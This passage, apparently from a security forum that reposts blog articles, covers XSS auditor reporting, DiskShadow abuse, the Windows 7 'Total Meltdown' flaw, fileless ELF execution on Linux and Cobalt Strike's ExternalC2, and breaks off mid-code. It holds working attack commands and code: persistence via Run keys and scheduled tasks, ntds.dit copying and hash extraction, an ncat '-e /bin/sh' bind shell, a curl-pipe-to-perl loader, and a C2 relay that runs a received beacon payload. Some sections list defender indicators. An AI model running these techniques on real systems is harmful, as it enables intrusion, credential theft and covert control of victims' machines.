CSP was to defend against XSS attacks, and it can do that very sucessfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other, leverage the protection of both! Whether you do or don't have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is a last line of defence in the browser then XXP is an additional, penulitmate line of defence. With the auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this. "xss-report" : { "request-url":"https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E", "request-body":""} } This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out. Support The XSS Auditor can send reports from Chromium and WebKit based browsers which gives us a pretty high level of visibility. WebKit will happily send those reports right now but Chrome does have a small interruption in service at present. You can read more in the Chromium Bug but Chrome will being sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful. Other Updates We've also released a few other features here and there over the last couple of months so I wanted to detail those too. The list is far from exhaustive but here's a few: When filtering your repors on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected. After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect. We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account and we have special handling in place for a few browser bugs so reports will make more sense overall. There have been countless UI tweaks and improvements to make the browsing experience better including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more! After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do! Sursa: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
  20. DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction MARCH 26, 2018 ~ BOHOPS [Source: blog.microsoft.com] Introduction Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations. *Don’t mind the ridiculous title – it just seemed thematic What is DiskShadow? “DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ – Microsoft Docs DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation), however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence. DiskShadow Command Execution As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file. Let’s demonstrate each of these capabilities: Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. Interactive Mode In the following example, a normal user invokes calc.exe: Script Mode In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt: diskshadow.exe /s c:\test\diskshadow.txt Like Vshadow, take note that the DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing. Auto-Start Persistence & Evasion Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the proceeding examples, we will update our script then create a RunKey and Scheduled Task. Preparation Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time. Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique: EXEC "cmd.exe" /c c:\test\evil.exe *In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode. Second, let’s add persistence with the following commands: - Run Key Value - reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt" - User Level Scheduled Task - schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt" Let’s take a further look at these… AutoRuns – Run Key Value After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot: After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry: AutoRuns – Scheduled Tasks Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view: After de-selecting “Hide Windows Entries”, we can see AutoRuns entry: Extracting the Active Directory Database Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode. First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system. Here is the DiskShadow script (diskshadow.txt): set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit delete shadows volume %someAlias% reset [Helpful Source: DataCore] In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias. *Note: We can attempt to copy out the target file by specifying a shadow device name /unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode. The commands and results of the DiskShadow operation are presented in this screenshot: type c:\diskshadow.txt diskshadow.exe /s c:\diskshadow.txt dir c:\exfil In addition to the AD database, we will also need to extract the SYSTEM registry hive: reg.exe save hklm\system c:\exfil\system.bak After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes: secretsdump.py -ntds ntds.dit -system system.bak LOCAL Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow… DiskShadow vs. Vshadow DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail: Operating System Inclusion DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK. Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage. Utility & Usage Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here. Command Line Orientation Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although, creating a text file will likely have less impact than uploading a binary – refer to the previous section). AutoRuns Persistence & Evasion In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage. Active Directory Database Extraction If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit. This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here. Conclusion All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following: Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit). Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process. Monitor process creation events for diskshadow.exe and spawned child processes. Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag. Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems. Monitor for new and interesting logical drive mappings. Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files. Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing. Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something! As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow! Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
  21. Total Meltdown? Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing. Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well. No fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process. Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write! Accessing memory at over 4GB/s, dumping to disk is slower due to disk transfer speeds. How is this possible? In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself. The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2. PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867. Windows have a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-referencing is fixed at the position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address: 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor). Since the permission bit was erroneously set to User this meant the PML4 was mapped into every process and made available to code executing in user-mode. "kernel address" memory addresses mapped in every process as user-mode read/write pages. Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory. The last '7' in the PML4e 0x0000000062100867 (from above example) indicates that bits 0, 1, 2 are set, which means it's Present, Writable and User-mode accessible as per the description in the Intel Manual. Excerpt from the Intel Manual, if bit 2 is set to '1' user-mode access are permitted. Can I try this out myself? Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system. Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force . If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes issue the command: pcileech.exe mount -device totalmeltdown . Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability. A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed. Is my system vulnerable? Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable. If your system isn't patched since December 2017 or if it's patched with the 2018-03 2018-03-29 patches or later it will be secure. Other Windows versions - such as Windows 10 or 8.1 are completely secure with regards to this issue and have never been affected by it. Other I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues. Updates Windows 2008R2 was vulnerable as well. OOB security update released to fully resolve the vulnerability on 2018-03-29. CVE-2018-1038. Apply immediately if affected! Timeline 2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication. 2018-03-26: Green light given by MSRC for me to publish blog entry. 2018-03-27: Published blog entry and PoC. 2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again. 2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected! Huge Thank You to everyone at Microsoft that worked hard to resolve this issue. It is super impressive to be able to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen. Sursa: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
  22. In-Memory-Only ELF Execution (Without tmpfs) 10 minute read CONTENTS INTRODUCTION CAVEATS ON TARGET MEMFD_CREATE(2) WRITE(2) OPTIONAL: FORK(2) EXECVE(2) SCRIPTING IT ARTIFACTS DEMO TL;DR In which we run a normal ELF binary on Linux without touching the filesystem (except /proc). Introduction Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process? Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary. The manpage has the following to say on the subject of naming anonymous files: The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects. In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name. Listing /proc/<PID>/fd, anonymous files look like this: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd total 0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted) lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted) Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie. Caveats Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely. We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative. As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work. The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r 4.4.0-116-generic On Target Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use. memfd_create(2) Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary. Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' * asm-generic/unistd.h:#define __NR_memfd_create 279 asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create) linux/memfd.h:#define MFD_CLOEXEC 0x0001U x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319 x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356 x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319) x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)). The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead. Putting it together, let’s finally make our anonymous file: my $name = ""; my $fd = syscall(319, $name, 1); if (-1 == $fd) { die "memfd_create: $!"; } We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`' total 0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted) write(2) Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it. Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle: open(my $FH, '>&='.$fd) or die "open: $!"; select((select($FH), $|=1)[0]); We now have a file handle which refers to our anonymous file. Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file. perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary This will give us many, many lines similar to: print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/; print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/; print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/; Exceuting those puts our ELF binary into memory. Time to run it. Optional: fork(2) Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like: while ($keep_going) { my $pid = fork(); if (-1 == $pid) { # Error die "fork: $!"; } if (0 == $pid) { # Child # Do child things here exit 0; } } Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate: # Spawn child my $pid = fork(); if (-1 == $pid) { # Error die "fork1: $!"; } if (0 != $pid) { # Parent terminates exit 0; } # In the child, become session leader if (-1 == syscall(112)) { die "setsid: $!"; } # Spawn grandchild $pid = fork(); if (-1 == $pid) { # Error die "fork2: $!"; } if (0 != $pid) { # Child terminates exit 0; } # In the grandchild here, do grandchild things We can now have our ELF process run multiple times or in a separate process. Let’s do it. execve(2) Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax. We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else. The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor. exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!"; The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process. We’ve now got an ELF binary running without putting anything on disk or even in the filesystem. Scripting it It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list: cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"' This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all. Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there. Artifacts Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong. Demo To see this in action, have a look at this asciicast. TL;DR In C (translate to your non-disk-touching language of choice): fd = memfd_create("", MFD_CLOEXEC); write(pid, elfbuffer, elfbuffer_len); asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL); Updated: March 31, 2018 Sursa: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
  23. Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. The protocol is actually pretty straight forward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. We will create a few quick helper function to allow us to prefix our 4 byte length without manually crafting it each time: def encodeFrame(data): return struct.pack("<I", len(data)) + data def sendToTS(data): _socketTS.sendall(encodeFrame(data)) Now we can use these helper functions to send over our options: # Send out config options sendToTS("arch=x86") sendToTS(“pipename=xpntest") sendToTS("block=500") sendToTS("go") Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time: def decodeFrame(data): len = struct.unpack("<I", data[0:3]) body = data[4:] return (len, body) def recvFromTS(): data = "" _len = _socketTS.recv(4) l = struct.unpack("<I",_len)[0] while len(data) < l: data += _socketTS.recv(l - len(data)) return data This allows us to receive raw data with: data = recvFromTS() Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to: _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketBeacon.bind(("0.0.0.0", 8081)) _socketBeacon.listen(1) _socketClient = _socketBeacon.accept()[0] Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host: while(True): print "Sending %d bytes to beacon" % len(data) sendToBeacon(data) data = recvFromBeacon() print "Received %d bytes from beacon" % len(data) print "Sending %d bytes to TS" % len(data) sendToTS(data) data = recvFromTS() print "Received %d bytes from TS" % len(data) Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client. To make things a bit easier, we will use win32 and C for this, giving us access to Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller: // Creates a new C2 controller connection for relaying commands SOCKET createC2Socket(const char *addr, WORD port) { WSADATA wsd; SOCKET sd; SOCKADDR_IN sin; WSAStartup(0x0202, &wsd); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.S_un.S_addr = inet_addr(addr); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sd, (SOCKADDR*)&sin, sizeof(sin)); return sd; } Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving: // Receives data from our C2 controller to be relayed to the injected beacon char *recvData(SOCKET sd, DWORD *len) { char *buffer; DWORD bytesReceived = 0, totalLen = 0; *len = 0; recv(sd, (char *)len, 4, 0); buffer = (char *)malloc(*len); if (buffer == NULL) return NULL; while (totalLen < *len) { bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0); totalLen += bytesReceived; } return buffer; } Similar, we need a way to return data over our C2 channel to the Controller: // Sends data to our C2 controller received from our injected beacon void sendData(SOCKET sd, const char *data, DWORD len) { char *buffer = (char *)malloc(len + 4); if (buffer == NULL): return; DWORD bytesWritten = 0, totalLen = 0; *(DWORD *)buffer = len; memcpy(buffer + 4, data, len); while (totalLen < len + 4) { bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0); totalLen += bytesWritten; } free(buffer); } Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload. This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char 